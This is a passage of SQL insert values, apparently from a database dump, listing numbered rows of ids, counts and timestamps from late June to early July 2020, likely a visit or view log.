17:42:20'),(3592,1600,1,'2020-06-21','2020-06-21 18:43:20'),(3593,2309,1,'2020-06-21','2020-06-21 20:13:09'),(3594,2956,1,'2020-06-22','2020-06-22 04:06:00'),(3595,2309,1,'2020-06-22','2020-06-22 09:35:40'),(3596,2801,1,'2020-06-22','2020-06-22 09:49:12'),(3597,2809,1,'2020-06-22','2020-06-22 10:00:43'),(3598,2309,1,'2020-06-22','2020-06-22 12:27:22'),(3599,91,1,'2020-06-22','2020-06-22 12:56:07'),(3600,2293,1,'2020-06-22','2020-06-22 13:09:01'),(3601,2609,1,'2020-06-22','2020-06-22 13:25:58'),(3602,91,1,'2020-06-22','2020-06-22 13:26:00'),(3603,2904,1,'2020-06-22','2020-06-22 14:16:44'),(3604,2609,1,'2020-06-22','2020-06-22 15:26:54'),(3605,3090,1,'2020-06-22','2020-06-22 16:16:57'),(3606,1604,1,'2020-06-22','2020-06-22 16:25:37'),(3607,1604,1,'2020-06-22','2020-06-22 16:25:52'),(3608,2252,1,'2020-06-22','2020-06-22 19:01:15'),(3609,3090,1,'2020-06-22','2020-06-22 19:55:18'),(3610,91,1,'2020-06-22','2020-06-22 20:50:46'),(3611,3092,1,'2020-06-22','2020-06-22 20:51:31'),(3612,91,1,'2020-06-22','2020-06-22 21:01:29'),(3613,91,1,'2020-06-22','2020-06-22 21:04:21'),(3614,3092,1,'2020-06-22','2020-06-22 21:04:48'),(3615,91,1,'2020-06-22','2020-06-22 21:06:46'),(3616,91,1,'2020-06-22','2020-06-22 21:18:23'),(3617,91,1,'2020-06-22','2020-06-22 21:36:00'),(3618,80,1,'2020-06-22','2020-06-22 22:14:47'),(3619,3096,1,'2020-06-22','2020-06-22 22:20:30'),(3620,89,1,'2020-06-22','2020-06-22 22:51:52'),(3621,2609,1,'2020-06-23','2020-06-23 00:48:35'),(3622,1730,1,'2020-06-23','2020-06-23 01:39:05'),(3623,2751,1,'2020-06-23','2020-06-23 02:39:26'),(3624,89,1,'2020-06-23','2020-06-23 05:01:09'),(3625,3083,1,'2020-06-23','2020-06-23 05:19:32'),(3626,1604,1,'2020-06-23','2020-06-23 06:39:58'),(3627,2457,1,'2020-06-23','2020-06-23 07:40:33'),(3628,2457,1,'2020-06-23','2020-06-23 08:49:55'),(3629,2457,1,'2020-06-23','2020-06-23 08:50:03'),(3630,1582,1,'2020-06-23','2020-06-23 09:41:30'),(3631,2309,1,'2020-06-23','2020-06-23 10:31:24'),(3632,1606,1,'2020-06-23','2020-06-23 15:56:10'),(3633,2609,1,'2020-06-24','2020-06-24 00:49:38'),(3634,2457,1,'2020-06-24','2020-06-24 09:10:12'),(3635,1614,1,'2020-06-24','2020-06-24 11:27:30'),(3636,68,1,'2020-06-24','2020-06-24 11:27:38'),(3637,2609,1,'2020-06-24','2020-06-24 11:45:34'),(3638,68,1,'2020-06-24','2020-06-24 11:50:43'),(3639,72,1,'2020-06-24','2020-06-24 11:53:42'),(3640,80,1,'2020-06-24','2020-06-24 11:54:19'),(3641,74,1,'2020-06-24','2020-06-24 11:55:31'),(3642,2503,1,'2020-06-24','2020-06-24 11:55:49'),(3643,2457,1,'2020-06-24','2020-06-24 12:09:54'),(3644,76,1,'2020-06-24','2020-06-24 12:12:46'),(3645,2309,1,'2020-06-24','2020-06-24 12:38:23'),(3646,2309,1,'2020-06-24','2020-06-24 12:54:50'),(3647,2309,1,'2020-06-24','2020-06-24 12:56:54'),(3648,89,1,'2020-06-24','2020-06-24 13:02:55'),(3649,1614,1,'2020-06-24','2020-06-24 13:03:03'),(3650,2309,1,'2020-06-24','2020-06-24 13:57:44'),(3651,91,1,'2020-06-24','2020-06-24 14:44:26'),(3652,72,1,'2020-06-24','2020-06-24 14:53:19'),(3653,80,1,'2020-06-24','2020-06-24 14:53:39'),(3654,1614,1,'2020-06-24','2020-06-24 15:12:28'),(3655,72,1,'2020-06-24','2020-06-24 15:21:10'),(3656,2309,1,'2020-06-24','2020-06-24 16:18:48'),(3657,2309,1,'2020-06-24','2020-06-24 16:18:51'),(3658,1600,1,'2020-06-25','2020-06-25 00:54:39'),(3659,3030,1,'2020-06-25','2020-06-25 04:40:33'),(3660,486,1,'2020-06-25','2020-06-25 09:25:57'),(3661,1600,1,'2020-06-25','2020-06-25 10:47:24'),(3662,1600,1,'2020-06-25','2020-06-25 11:36:00'),(3663,1586,1,'2020-06-25','2020-06-25 11:54:26'),(3664,72,1,'2020-06-25','2020-06-25 13:35:05'),(3665,1588,1,'2020-06-25','2020-06-25 13:39:15'),(3666,1604,1,'2020-06-25','2020-06-25 14:49:50'),(3667,1588,1,'2020-06-25','2020-06-25 15:32:10'),(3668,1711,1,'2020-06-25','2020-06-25 16:09:53'),(3669,2609,1,'2020-06-25','2020-06-25 16:51:56'),(3670,1730,1,'2020-06-25','2020-06-25 17:19:52'),(3671,89,1,'2020-06-25','2020-06-25 18:51:00'),(3672,1586,1,'2020-06-25','2020-06-25 19:32:54'),(3673,1586,1,'2020-06-25','2020-06-25 21:00:19'),(3674,1600,1,'2020-06-25','2020-06-25 21:00:36'),(3675,2309,1,'2020-06-25','2020-06-25 21:30:28'),(3676,2457,1,'2020-06-25','2020-06-25 22:20:47'),(3677,1588,1,'2020-06-25','2020-06-25 23:12:21'),(3678,3069,1,'2020-06-25','2020-06-25 23:55:34'),(3679,2309,1,'2020-06-26','2020-06-26 00:10:58'),(3680,3030,1,'2020-06-26','2020-06-26 04:30:22'),(3681,2813,1,'2020-06-26','2020-06-26 05:54:33'),(3682,2309,1,'2020-06-26','2020-06-26 07:05:37'),(3683,1588,1,'2020-06-26','2020-06-26 08:04:50'),(3684,2309,1,'2020-06-26','2020-06-26 10:55:39'),(3685,1730,1,'2020-06-26','2020-06-26 11:26:09'),(3686,1604,1,'2020-06-26','2020-06-26 11:36:08'),(3687,1730,1,'2020-06-26','2020-06-26 12:13:43'),(3688,91,1,'2020-06-26','2020-06-26 15:02:41'),(3689,80,1,'2020-06-26','2020-06-26 15:07:32'),(3690,76,1,'2020-06-26','2020-06-26 15:07:56'),(3691,68,1,'2020-06-26','2020-06-26 15:08:13'),(3692,3099,1,'2020-06-26','2020-06-26 15:09:44'),(3693,72,1,'2020-06-26','2020-06-26 15:28:23'),(3694,3053,1,'2020-06-26','2020-06-26 15:28:58'),(3695,72,1,'2020-06-26','2020-06-26 15:29:10'),(3696,3056,1,'2020-06-26','2020-06-26 15:29:22'),(3697,72,1,'2020-06-26','2020-06-26 15:29:35'),(3698,3030,1,'2020-06-26','2020-06-26 15:30:38'),(3699,2801,1,'2020-06-26','2020-06-26 15:31:02'),(3700,2813,1,'2020-06-26','2020-06-26 15:34:51'),(3701,2801,1,'2020-06-26','2020-06-26 15:35:01'),(3702,2248,1,'2020-06-26','2020-06-26 16:28:24'),(3703,1588,1,'2020-06-26','2020-06-26 17:09:02'),(3704,2609,1,'2020-06-26','2020-06-26 18:19:29'),(3705,570,1,'2020-06-26','2020-06-26 19:28:10'),(3706,1600,1,'2020-06-26','2020-06-26 19:35:26'),(3707,2309,1,'2020-06-26','2020-06-26 20:34:56'),(3708,1604,1,'2020-06-26','2020-06-26 22:29:11'),(3709,2813,1,'2020-06-27','2020-06-27 04:32:50'),(3710,3069,1,'2020-06-27','2020-06-27 04:54:14'),(3711,1730,1,'2020-06-27','2020-06-27 05:49:52'),(3712,2309,1,'2020-06-27','2020-06-27 06:44:16'),(3713,1604,1,'2020-06-27','2020-06-27 09:23:09'),(3714,2309,1,'2020-06-27','2020-06-27 12:19:54'),(3715,1588,1,'2020-06-27','2020-06-27 12:24:59'),(3716,2309,1,'2020-06-27','2020-06-27 12:56:10'),(3717,2411,1,'2020-06-27','2020-06-27 12:59:07'),(3718,2309,1,'2020-06-27','2020-06-27 13:03:22'),(3719,2309,1,'2020-06-27','2020-06-27 13:19:09'),(3720,2297,1,'2020-06-27','2020-06-27 13:19:32'),(3721,2309,1,'2020-06-27','2020-06-27 13:31:08'),(3722,2309,1,'2020-06-27','2020-06-27 14:09:09'),(3723,2309,1,'2020-06-27','2020-06-27 15:46:15'),(3724,2309,1,'2020-06-27','2020-06-27 15:59:29'),(3725,570,1,'2020-06-27','2020-06-27 16:06:02'),(3726,3069,1,'2020-06-27','2020-06-27 16:36:19'),(3727,1588,1,'2020-06-27','2020-06-27 21:37:43'),(3728,2751,1,'2020-06-27','2020-06-27 22:04:18'),(3729,2904,1,'2020-06-27','2020-06-27 22:28:27'),(3730,1588,1,'2020-06-27','2020-06-27 22:50:31'),(3731,2309,1,'2020-06-27','2020-06-27 22:54:30'),(3732,1582,1,'2020-06-27','2020-06-27 23:24:37'),(3733,2801,1,'2020-06-27','2020-06-27 23:56:38'),(3734,2769,1,'2020-06-27','2020-06-27 23:58:58'),(3735,1730,1,'2020-06-28','2020-06-28 00:29:11'),(3736,68,1,'2020-06-28','2020-06-28 00:49:25'),(3737,2309,1,'2020-06-28','2020-06-28 01:14:58'),(3738,570,1,'2020-06-28','2020-06-28 01:26:13'),(3739,570,1,'2020-06-28','2020-06-28 01:32:38'),(3740,3069,1,'2020-06-28','2020-06-28 03:51:00'),(3741,89,1,'2020-06-28','2020-06-28 04:30:50'),(3742,2911,1,'2020-06-28','2020-06-28 04:57:17'),(3743,2911,1,'2020-06-28','2020-06-28 04:57:52'),(3744,76,1,'2020-06-28','2020-06-28 06:31:33'),(3745,2309,1,'2020-06-28','2020-06-28 10:42:53'),(3746,2801,1,'2020-06-28','2020-06-28 12:07:22'),(3747,2904,1,'2020-06-28','2020-06-28 12:13:06'),(3748,2309,1,'2020-06-28','2020-06-28 12:15:02'),(3749,570,1,'2020-06-28','2020-06-28 12:45:44'),(3750,72,1,'2020-06-28','2020-06-28 15:41:09'),(3751,80,1,'2020-06-28','2020-06-28 15:41:19'),(3752,3069,1,'2020-06-28','2020-06-28 15:43:16'),(3753,91,1,'2020-06-28','2020-06-28 16:14:25'),(3754,1743,1,'2020-06-28','2020-06-28 16:15:15'),(3755,1604,1,'2020-06-28','2020-06-28 17:59:04'),(3756,89,1,'2020-06-28','2020-06-28 19:45:39'),(3757,2309,1,'2020-06-28','2020-06-28 20:15:52'),(3758,1598,1,'2020-06-28','2020-06-28 20:45:40'),(3759,335,1,'2020-06-28','2020-06-28 20:55:47'),(3760,2904,1,'2020-06-28','2020-06-28 21:05:47'),(3761,2801,1,'2020-06-28','2020-06-28 21:16:00'),(3762,72,1,'2020-06-28','2020-06-28 21:55:41'),(3763,1737,1,'2020-06-28','2020-06-28 22:54:16'),(3764,2751,1,'2020-06-29','2020-06-29 00:17:04'),(3765,2457,1,'2020-06-29','2020-06-29 00:46:40'),(3766,2457,1,'2020-06-29','2020-06-29 01:07:11'),(3767,3069,1,'2020-06-29','2020-06-29 01:17:03'),(3768,2419,1,'2020-06-29','2020-06-29 02:40:19'),(3769,2419,1,'2020-06-29','2020-06-29 02:48:17'),(3770,80,1,'2020-06-29','2020-06-29 02:52:49'),(3771,2813,1,'2020-06-29','2020-06-29 03:17:05'),(3772,91,1,'2020-06-29','2020-06-29 03:47:01'),(3773,91,1,'2020-06-29','2020-06-29 04:27:28'),(3774,2309,1,'2020-06-29','2020-06-29 04:47:10'),(3775,89,1,'2020-06-29','2020-06-29 05:43:52'),(3776,2801,1,'2020-06-29','2020-06-29 05:57:42'),(3777,335,1,'2020-06-29','2020-06-29 06:27:07'),(3778,2751,1,'2020-06-29','2020-06-29 09:08:21'),(3779,2751,1,'2020-06-29','2020-06-29 09:56:29'),(3780,1604,1,'2020-06-29','2020-06-29 10:05:09'),(3781,3069,1,'2020-06-29','2020-06-29 10:08:18'),(3782,2751,1,'2020-06-29','2020-06-29 10:38:39'),(3783,1614,1,'2020-06-29','2020-06-29 11:11:36'),(3784,2609,1,'2020-06-29','2020-06-29 11:35:21'),(3785,2804,1,'2020-06-29','2020-06-29 11:39:40'),(3786,80,1,'2020-06-29','2020-06-29 11:58:35'),(3787,72,1,'2020-06-29','2020-06-29 12:48:54'),(3788,2410,1,'2020-06-29','2020-06-29 13:10:22'),(3789,2309,1,'2020-06-29','2020-06-29 14:09:16'),(3790,91,1,'2020-06-29','2020-06-29 14:39:20'),(3791,335,1,'2020-06-29','2020-06-29 15:19:20'),(3792,2775,1,'2020-06-29','2020-06-29 15:29:32'),(3793,2801,1,'2020-06-29','2020-06-29 15:39:39'),(3794,1604,1,'2020-06-29','2020-06-29 15:57:03'),(3795,91,1,'2020-06-29','2020-06-29 15:58:17'),(3796,2813,1,'2020-06-29','2020-06-29 16:09:53'),(3797,1741,1,'2020-06-29','2020-06-29 16:20:02'),(3798,68,1,'2020-06-29','2020-06-29 16:29:50'),(3799,1737,1,'2020-06-29','2020-06-29 16:50:09'),(3800,1604,1,'2020-06-29','2020-06-29 17:56:24'),(3801,76,1,'2020-06-29','2020-06-29 17:59:05'),(3802,1614,1,'2020-06-29','2020-06-29 18:04:44'),(3803,1730,1,'2020-06-29','2020-06-29 18:21:49'),(3804,2457,1,'2020-06-29','2020-06-29 19:11:18'),(3805,3069,1,'2020-06-29','2020-06-29 19:21:30'),(3806,2751,1,'2020-06-29','2020-06-29 19:31:22'),(3807,2457,1,'2020-06-29','2020-06-29 20:01:30'),(3808,2991,1,'2020-06-29','2020-06-29 21:19:52'),(3809,80,1,'2020-06-29','2020-06-29 21:32:14'),(3810,2309,1,'2020-06-30','2020-06-30 00:01:59'),(3811,2309,1,'2020-06-30','2020-06-30 00:12:01'),(3812,72,1,'2020-06-30','2020-06-30 00:46:04'),(3813,2813,1,'2020-06-30','2020-06-30 00:57:48'),(3814,2801,1,'2020-06-30','2020-06-30 01:11:35'),(3815,68,1,'2020-06-30','2020-06-30 01:45:59'),(3816,91,1,'2020-06-30','2020-06-30 02:06:05'),(3817,335,1,'2020-06-30','2020-06-30 02:16:27'),(3818,2775,1,'2020-06-30','2020-06-30 02:26:00'),(3819,3045,1,'2020-06-30','2020-06-30 03:15:58'),(3820,1737,1,'2020-06-30','2020-06-30 03:25:37'),(3821,2457,1,'2020-06-30','2020-06-30 05:25:50'),(3822,80,1,'2020-06-30','2020-06-30 06:25:37'),(3823,2991,1,'2020-06-30','2020-06-30 06:45:24'),(3824,72,1,'2020-06-30','2020-06-30 09:57:20'),(3825,2801,1,'2020-06-30','2020-06-30 10:15:21'),(3826,1604,1,'2020-06-30','2020-06-30 10:35:59'),(3827,1604,1,'2020-06-30','2020-06-30 10:36:38'),(3828,1544,1,'2020-06-30','2020-06-30 10:37:03'),(3829,1614,1,'2020-06-30','2020-06-30 10:37:18'),(3830,1544,1,'2020-06-30','2020-06-30 10:37:54'),(3831,108,1,'2020-06-30','2020-06-30 10:38:08'),(3832,3092,1,'2020-06-30','2020-06-30 10:39:08'),(3833,3096,1,'2020-06-30','2020-06-30 10:39:14'),(3834,470,1,'2020-06-30','2020-06-30 10:39:45'),(3835,1606,1,'2020-06-30','2020-06-30 10:43:57'),(3836,2813,1,'2020-06-30','2020-06-30 11:01:39'),(3837,91,1,'2020-06-30','2020-06-30 11:07:37'),(3838,2775,1,'2020-06-30','2020-06-30 14:17:51'),(3839,68,1,'2020-06-30','2020-06-30 14:37:50'),(3840,2410,1,'2020-06-30','2020-06-30 16:17:56'),(3841,91,1,'2020-06-30','2020-06-30 19:50:03'),(3842,1614,1,'2020-07-01','2020-07-01 13:22:47'),(3843,1614,1,'2020-07-01','2020-07-01 14:51:52'),(3844,1614,1,'2020-07-01','2020-07-01 14:52:22'),(3845,2457,1,'2020-07-01','2020-07-01 14:53:23'),(3846,3099,1,'2020-07-01','2020-07-01 14:54:59'),(3847,2457,1,'2020-07-01','2020-07-01 14:55:50'),(3848,1614,1,'2020-07-01','2020-07-01 14:55:53'),(3849,80,1,'2020-07-02','2020-07-02 02:22:43'),(3850,1588,1,'2020-07-02','2020-07-02 02:43:26'),(3851,89,1,'2020-07-02','2020-07-02 03:04:20'),(3852,1749,1,'2020-07-02','2020-07-02 03:05:04'),(3853,2309,1,'2020-07-02','2020-07-02 03:52:40'),(3854,1588,1,'2020-07-02','2020-07-02 05:21:15'),(3855,3030,1,'2020-07-02','2020-07-02 06:38:58'),(3856,3099,1,'2020-07-02','2020-07-02 06:50:05'),(3857,1718,1,'2020-07-02','2020-07-02 08:15:00'),(3858,80,1,'2020-07-02','2020-07-02 09:50:37'),(3859,1582,1,'2020-07-02','2020-07-02 10:30:08'),(3860,2457,1,'2020-07-02','2020-07-02 11:12:59'),(3861,2457,1,'2020-07-02','2020-07-02 11:17:40'),(3862,76,1,'2020-07-02','2020-07-02 11:17:53'),(3863,76,1,'2020-07-02','2020-07-02 11:18:13'),(3864,2457,1,'2020-07-02','2020-07-02 11:18:20'),(3865,486,1,'2020-07-02','2020-07-02 11:39:21'),(3866,2309,1,'2020-07-02','2020-07-02 12:19:59'),(3867,3058,1,'2020-07-02','2020-07-02 14:11:10'),(3868,2801,1,'2020-07-02','2020-07-02 15:58:00'),(3869,2309,1,'2020-07-02','2020-07-02 17:52:53'),(3870,3099,1,'2020-07-02','2020-07-02 18:22:42'),(3871,1600,1,'2020-07-02','2020-07-02 18:53:10'),(3872,1588,1,'2020-07-02','2020-07-02 18:53:27'),(3873,89,1,'2020-07-02','2020-07-02 19:33:39'),(3874,3060,1,'2020-07-02','2020-07-02 21:11:06'),(3875,1718,1,'2020-07-02','2020-07-02 22:45:39'),(3876,80,1,'2020-07-02','2020-07-02 23:36:09'),(3877,91,1,'2020-07-02','2020-07-02 23:56:53'),(3878,486,1,'2020-07-03','2020-07-03 01:53:53'),(3879,3030,1,'2020-07-03','2020-07-03 02:22:02'),(3880,1600,1,'2020-07-03','2020-07-03 02:28:32'),(3881,2801,1,'2020-07-03','2020-07-03 02:34:05'),(3882,2178,1,'2020-07-03','2020-07-03 02:37:08'),(3883,2309,1,'2020-07-03','2020-07-03 03:37:47'),(3884,72,1,'2020-07-03','2020-07-03 04:48:36'),(3885,108,1,'2020-07-03','2020-07-03 05:26:25'),(3886,1730,1,'2020-07-03','2020-07-03 05:58:42'),(3887,80,1,'2020-07-03','2020-07-03 07:42:29'),(3888,80,1,'2020-07-03','2020-07-03 08:00:30'),(3889,2964,1,'2020-07-03','2020-07-03 08:07:51'),(3890,89,1,'2020-07-03','2020-07-03 08:10:26'),(3891,2989,1,'2020-07-03','2020-07-03 08:30:34'),(3892,1705,1,'2020-07-03','2020-07-03 08:33:17'),(3893,3097,1,'2020-07-03','2020-07-03 08:50:51'),(3894,2801,1,'2020-07-03','2020-07-03 09:12:04'),(3895,2309,1,'2020-07-03','2020-07-03 12:41:59'),(3896,80,1,'2020-07-03','2020-07-03 12:52:09'),(3897,2309,1,'2020-07-03','2020-07-03 13:22:15'),(3898,2801,1,'2020-07-03','2020-07-03 14:33:04'),(3899,2775,1,'2020-07-03','2020-07-03 14:42:41'),(3900,2964,1,'2020-07-03','2020-07-03 14:43:49'),(3901,1730,1,'2020-07-03','2020-07-03 15:53:13'),(3902,2964,1,'2020-07-03','2020-07-03 17:07:30'),(3903,80,1,'2020-07-03','2020-07-03 17:14:49'),(3904,3090,1,'2020-07-03','2020-07-03 17:16:49'),(3905,89,1,'2020-07-03','2020-07-03 17:24:02'),(3906,2813,1,'2020-07-03','2020-07-03 17:49:40'),(3907,3097,1,'2020-07-03','2020-07-03 18:04:16'),(3908,2801,1,'2020-07-03','2020-07-03 18:24:15'),(3909,91,1,'2020-07-03','2020-07-03 18:33:52'),(3910,2769,1,'2020-07-03','2020-07-03 18:53:46'),(3911,3027,1,'2020-07-03','2020-07-03 19:25:53'),(3912,1705,1,'2020-07-03','2020-07-03 19:33:56'),(3913,3027,1,'2020-07-03','2020-07-03 20:09:24'),(3914,89,1,'2020-07-03','2020-07-03 20:13:37'),(3915,1718,1,'2020-07-03','2020-07-03 20:23:51'),(3916,102,1,'2020-07-03','2020-07-03 20:43:48'),(3917,68,1,'2020-07-03','2020-07-03 22:04:04'),(3918,479,1,'2020-07-03','2020-07-03 22:13:50'),(3919,2609,1,'2020-07-03','2020-07-03 22:44:15'),(3920,2609,1,'2020-07-03','2020-07-03 23:23:41'),(3921,2309,1,'2020-07-03','2020-07-03 23:43:42'),(3922,2801,1,'2020-07-04','2020-07-04 00:08:02'),(3923,2309,1,'2020-07-04','2020-07-04 00:34:16'),(3924,80,1,'2020-07-04','2020-07-04 01:03:57'),(3925,1730,1,'2020-07-04','2020-07-04 02:45:22'),(3926,1604,1,'2020-07-04','2020-07-04 03:45:20'),(3927,1604,1,'2020-07-04','2020-07-04 04:25:03'),(3928,80,1,'2020-07-04','2020-07-04 04:45:14'),(3929,3027,1,'2020-07-04','2020-07-04 05:05:22'),(3930,2964,1,'2020-07-04','2020-07-04 05:45:03'),(3931,89,1,'2020-07-04','2020-07-04 05:45:07'),(3932,3097,1,'2020-07-04','2020-07-04 06:12:43'),(3933,2801,1,'2020-07-04','2020-07-04 06:25:31'),(3934,2609,1,'2020-07-04','2020-07-04 08:01:53'),(3935,2609,1,'2020-07-04','2020-07-04 08:41:53'),(3936,2993,1,'2020-07-04','2020-07-04 09:42:53'),(3937,2309,1,'2020-07-04','2020-07-04 10:12:22'),(3938,1604,1,'2020-07-04','2020-07-04 13:03:42'),(3939,2309,1,'2020-07-04','2020-07-04 14:14:16'),(3940,80,1,'2020-07-04','2020-07-04 15:04:34'),(3941,89,1,'2020-07-04','2020-07-04 15:24:22'),(3942,3066,1,'2020-07-04','2020-07-04 16:33:00'),(3943,2813,1,'2020-07-04','2020-07-04 16:55:51'),(3944,2309,1,'2020-07-04','2020-07-04 18:56:42'),(3945,2769,1,'2020-07-04','2020-07-04 19:26:41'),(3946,1588,1,'2020-07-04','2020-07-04 19:28:28'),(3947,2609,1,'2020-07-04','2020-07-04 19:36:28'),(3948,2801,1,'2020-07-04','2020-07-04 20:07:05'),(3949,1588,1,'2020-07-04','2020-07-04 20:44:07'),(3950,1604,1,'2020-07-04','2020-07-04 21:17:18'),(3951,2309,1,'2020-07-04','2020-07-04 22:58:13'),(3952,1600,1,'2020-07-05','2020-07-05 00:28:40'),(3953,1600,1,'2020-07-05','2020-07-05 00:38:45'),(3954,1600,1,'2020-07-05','2020-07-05 01:55:55'),(3955,2813,1,'2020-07-05','2020-07-05 02:31:18'),(3956,1588,1,'2020-07-05','2020-07-05 03:19:14'),(3957,1730,1,'2020-07-05','2020-07-05 03:29:18'),(3958,2904,1,'2020-07-05','2020-07-05 04:19:49'),(3959,2801,1,'2020-07-05','2020-07-05 05:11:02'),(3960,2609,1,'2020-07-05','2020-07-05 05:50:05'),(3961,2964,1,'2020-07-05','2020-07-05 05:58:23'),(3962,80,1,'2020-07-05','2020-07-05 06:00:02'),(3963,2309,1,'2020-07-05','2020-07-05 08:06:48'),(3964,2609,1,'2020-07-05','2020-07-05 08:37:05'),(3965,1600,1,'2020-07-05','2020-07-05 08:57:19'),(3966,2309,1,'2020-07-05','2020-07-05 09:27:29'),(3967,1604,1,'2020-07-05','2020-07-05 10:08:08'),(3968,1604,1,'2020-07-05','2020-07-05 10:41:05'),(3969,2457,1,'2020-07-05','2020-07-05 10:43:12'),(3970,3072,1,'2020-07-05','2020-07-05 11:06:49'),(3971,2769,1,'2020-07-05','2020-07-05 11:28:45'),(3972,335,1,'2020-07-05','2020-07-05 12:39:04'),(3973,2801,1,'2020-07-05','2020-07-05 14:50:08'),(3974,1588,1,'2020-07-05','2020-07-05 16:42:12'),(3975,1588,1,'2020-07-05','2020-07-05 17:01:25'),(3976,1600,1,'2020-07-05','2020-07-05 18:12:26'),(3977,2609,1,'2020-07-05','2020-07-05 19:42:14'),(3978,2309,1,'2020-07-05','2020-07-05 20:31:49'),(3979,2609,1,'2020-07-05','2020-07-05 20:51:32'),(3980,1730,1,'2020-07-05','2020-07-05 21:01:19'),(3981,2964,1,'2020-07-05','2020-07-05 22:06:39'),(3982,2801,1,'2020-07-06','2020-07-06 00:34:43'),(3983,1604,1,'2020-07-06','2020-07-06 00:52:21'),(3984,1588,1,'2020-07-06','2020-07-06 03:42:44'),(3985,2769,1,'2020-07-06','2020-07-06 04:52:02'),(3986,2309,1,'2020-07-06','2020-07-06 05:02:00'),(3987,2609,1,'2020-07-06','2020-07-06 05:41:58'),(3988,1600,1,'2020-07-06','2020-07-06 06:21:59'),(3989,2609,1,'2020-07-06','2020-07-06 07:22:30'),(3990,1600,1,'2020-07-06','2020-07-06 07:52:31'),(3991,80,1,'2020-07-06','2020-07-06 08:18:28'),(3992,2801,1,'2020-07-06','2020-07-06 09:01:45'),(3993,108,1,'2020-07-06','2020-07-06 10:18:45'),(3994,1600,1,'2020-07-06','2020-07-06 10:29:53'),(3995,1614,1,'2020-07-06','2020-07-06 11:11:19'),(3996,1600,1,'2020-07-06','2020-07-06 11:19:51'),(3997,1600,1,'2020-07-06','2020-07-06 11:20:14'),(3998,1766,1,'2020-07-06','2020-07-06 11:20:56'),(3999,1766,1,'2020-07-06','2020-07-06 11:25:06'),(4000,1766,1,'2020-07-06','2020-07-06 11:26:13'),(4001,1766,1,'2020-07-06','2020-07-06 11:27:36'),(4002,1766,1,'2020-07-06','2020-07-06 11:30:24'),(4003,1774,1,'2020-07-06','2020-07-06 11:31:20'),(4004,1766,1,'2020-07-06','2020-07-06 11:31:35'),(4005,1774,1,'2020-07-06','2020-07-06 11:31:56'),(4006,1766,1,'2020-07-06','2020-07-06 11:32:19'),(4007,1766,1,'2020-07-06','2020-07-06 11:34:44'),(4008,72,1,'2020-07-06','2020-07-06 11:36:38'),(4009,1766,1,'2020-07-06','2020-07-06 11:37:39'),(4010,3099,1,'2020-07-06','2020-07-06 11:38:52'),(4011,1766,1,'2020-07-06','2020-07-06 11:43:32'),(4012,2148,1,'2020-07-06','2020-07-06 12:00:18'),(4013,1766,1,'2020-07-06','2020-07-06 12:00:23'),(4014,1600,1,'2020-07-06','2020-07-06 12:00:34'),(4015,1588,1,'2020-07-06','2020-07-06 14:05:35'),(4016,2309,1,'2020-07-06','2020-07-06 14:45:30'),(4017,1600,1,'2020-07-06','2020-07-06 15:05:12'),(4018,1596,1,'2020-07-06','2020-07-06 15:33:43'),(4019,2609,1,'2020-07-06','2020-07-06 15:35:17'),(4020,1606,1,'2020-07-06','2020-07-06 16:05:22'),(4021,2609,1,'2020-07-06','2020-07-06 16:05:27'),(4022,2769,1,'2020-07-06','2020-07-06 16:55:42'),(4023,1588,1,'2020-07-06','2020-07-06 17:06:07'),(4024,1718,1,'2020-07-06','2020-07-06 17:06:56'),(4025,2457,1,'2020-07-06','2020-07-06 17:15:43'),(4026,1600,1,'2020-07-06','2020-07-06 17:23:35'),(4027,1586,1,'2020-07-06','2020-07-06 18:17:14'),(4028,80,1,'2020-07-06','2020-07-06 19:46:45'),(4029,1604,1,'2020-07-06','2020-07-06 19:56:28'),(4030,2801,1,'2020-07-06','2020-07-06 20:06:51'),(4031,3096,1,'2020-07-06','2020-07-06 21:24:21'),(4032,2420,1,'2020-07-06','2020-07-06 21:27:44'),(4033,89,1,'2020-07-06','2020-07-06 22:08:14'),(4034,1604,1,'2020-07-06','2020-07-06 22:37:47'),(4035,3083,1,'2020-07-06','2020-07-06 22:48:10'),(4036,3066,1,'2020-07-06','2020-07-06 23:11:29'),(4037,1588,1,'2020-07-07','2020-07-07 04:19:23'),(4038,1604,1,'2020-07-07','2020-07-07 05:30:57'),(4039,80,1,'2020-07-07','2020-07-07 05:50:55'),(4040,2801,1,'2020-07-07','2020-07-07 06:55:46'),(4041,2609,1,'2020-07-07','2020-07-07 07:11:12'),(4042,2457,1,'2020-07-07','2020-07-07 07:41:36'),(4043,2457,1,'2020-07-07','2020-07-07 07:41:49'),(4044,1730,1,'2020-07-07','2020-07-07 09:11:32'),(4045,108,1,'2020-07-07','2020-07-07 11:02:30'),(4046,1600,1,'2020-07-07','2020-07-07 11:42:22'),(4047,2609,1,'2020-07-07','2020-07-07 12:12:28'),(4048,570,1,'2020-07-07','2020-07-07 12:27:02'),(4049,72,1,'2020-07-07','2020-07-07 12:32:46'),(4050,570,1,'2020-07-07','2020-07-07 13:02:21'),(4051,3069,1,'2020-07-07','2020-07-07 13:11:04'),(4052,89,1,'2020-07-07','2020-07-07 14:09:33'),(4053,3083,1,'2020-07-07','2020-07-07 14:10:27'),(4054,1604,1,'2020-07-07','2020-07-07 14:14:02'),(4055,1588,1,'2020-07-07','2020-07-07 14:33:48'),(4056,2904,1,'2020-07-07','2020-07-07 14:36:49'),(4057,91,1,'2020-07-07','2020-07-07 15:01:09'),(4058,80,1,'2020-07-07','2020-07-07 16:26:49'),(4059,2609,1,'2020-07-07','2020-07-07 17:05:42'),(4060,2801,1,'2020-07-07','2020-07-07 17:06:34'),(4061,2769,1,'2020-07-07','2020-07-07 17:27:25'),(4062,2769,1,'2020-07-07','2020-07-07 17:41:35'),(4063,2769,1,'2020-07-07','2020-07-07 18:34:01'),(4064,3069,1,'2020-07-07','2020-07-07 20:19:04'),(4065,1588,1,'2020-07-07','2020-07-07 22:10:39'),(4066,89,1,'2020-07-07','2020-07-07 22:59:39'),(4067,1588,1,'2020-07-07','2020-07-07 23:33:42'),(4068,3069,1,'2020-07-08','2020-07-08 00:33:55'),(4069,80,1,'2020-07-08','2020-07-08 01:04:26'),(4070,2813,1,'2020-07-08','2020-07-08 03:09:25'),(4071,2801,1,'2020-07-08','2020-07-08 03:20:18'),(4072,2609,1,'2020-07-08','2020-07-08 03:58:00'),(4073,2904,1,'2020-07-08','2020-07-08 04:42:02'),(4074,1600,1,'2020-07-08','2020-07-08 06:12:09'),(4075,1588,1,'2020-07-08','2020-07-08 07:43:11'),(4076,1588,1,'2020-07-08','2020-07-08 08:53:02'),(4077,3038,1,'2020-07-08','2020-07-08 09:10:29'),(4078,1606,1,'2020-07-08','2020-07-08 